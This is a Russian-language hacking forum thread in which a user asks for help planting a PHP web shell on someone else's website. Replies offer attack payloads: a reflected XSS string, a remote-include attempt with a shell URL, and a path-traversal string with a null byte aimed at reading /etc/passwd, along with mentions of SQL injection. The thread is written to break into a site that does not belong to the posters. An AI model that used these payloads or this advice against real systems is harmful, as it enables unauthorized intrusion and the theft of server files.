Локальный Инклуд
 

Здравствуйте!

Такая проблема.

Сайт не фильтрует символы в адресной строке браузера. Что ты туда вводишь ( к примеру, тег изображения ), то этот тег станет картинкой в теле страницы. Вот в чем вопрос.

Мне надо залить файл shell.php на тот хостинг, где стоит сайт!! Но как это сделать - не знаю!

При чем, если в адр. строку браузера вписать index.php?idn=<img src=javascript:alert()>, то выскочит окно!!

Хелп, плиз!!!

index.php?idn=[Адрес шелла]

некатит? 0_о

Не получается. Пишет

Warning: main(categories/http://***.ru/shell.php.htm): failed to open stream: No such file or directory in /www/htdocs/index.php on line 440

Нужно что-то с тегами!

толпаеп, это лок. инклуд насколько я понимаю... исчи статью Грин_бира про локальный инклуд

NightRider
Лучше дай ссылку на сайт посматреть, а то так не понятно что у тебя там, толи xss толи лок.инкдул... или вообще все вместе...
Попробуй /../../../../../../../etc/passwd%00 дописать

локальный инклуд...

там только xss работает...
через лок.инклуд не чего не поимеешь

там кстати скуль вместе с инклудом О_о